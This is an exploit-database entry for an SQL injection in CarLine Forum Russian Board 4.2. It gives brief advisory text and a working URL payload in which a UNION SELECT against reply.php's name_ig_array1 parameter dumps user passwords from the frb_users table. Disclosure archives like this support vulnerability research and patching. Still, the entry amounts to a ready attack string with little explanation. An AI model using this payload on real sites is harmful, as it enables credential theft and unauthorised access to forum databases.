CarLine Forum Russian Board 4.2 - 'reply.php?name_ig_array1[1]' SQL Injection

EDB-ID:

25889

CVE:



Author:

1dt.w0lf

Type:

webapps


Platform:

PHP

Date:

2005-06-23


source: https://www.securityfocus.com/bid/14045/info
            
Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks.
            
Forum Russian Board 4.2 is reported to be affected. 

reply.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]=666' union select password,password from frb_users /*